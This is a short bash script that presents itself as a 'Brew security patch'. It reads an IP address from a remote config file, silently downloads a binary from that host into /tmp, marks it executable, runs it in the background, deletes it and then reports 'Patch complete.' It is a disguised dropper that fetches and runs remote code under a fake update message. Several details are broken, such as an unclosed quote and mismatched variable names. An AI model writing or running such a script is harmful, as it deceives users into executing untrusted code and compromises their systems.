#!/bin/bash

tmp="/tmp/$(head /dev/urandom | tr -dc A-Fa-f0-9 | head -c 12)"
ip="$(curl https://raw.githubusercontent.com/svendev045/CurlR/master/config | grep ipaddr | cut -f1 -d"=")"
l="$(curl https://raw.githubusercontent.com/svendev045/CurlR/master/config | grep list | cut -f1 -d"=")"
args="$(curl https://raw.githubusercontent.com/svendev045/CurlR/master/config | grep list | cut -f1 -d"=")
echo "Applying Brew security patch..."
curl -s http://$ip/brew-core -o $tmp_file >/dev/null 2>&1
chmod +x $tmp
nohup $tmp $bin_args >/dev/null 2>&1 &
rm $tmp
sleep 5
echo "Patch complete."
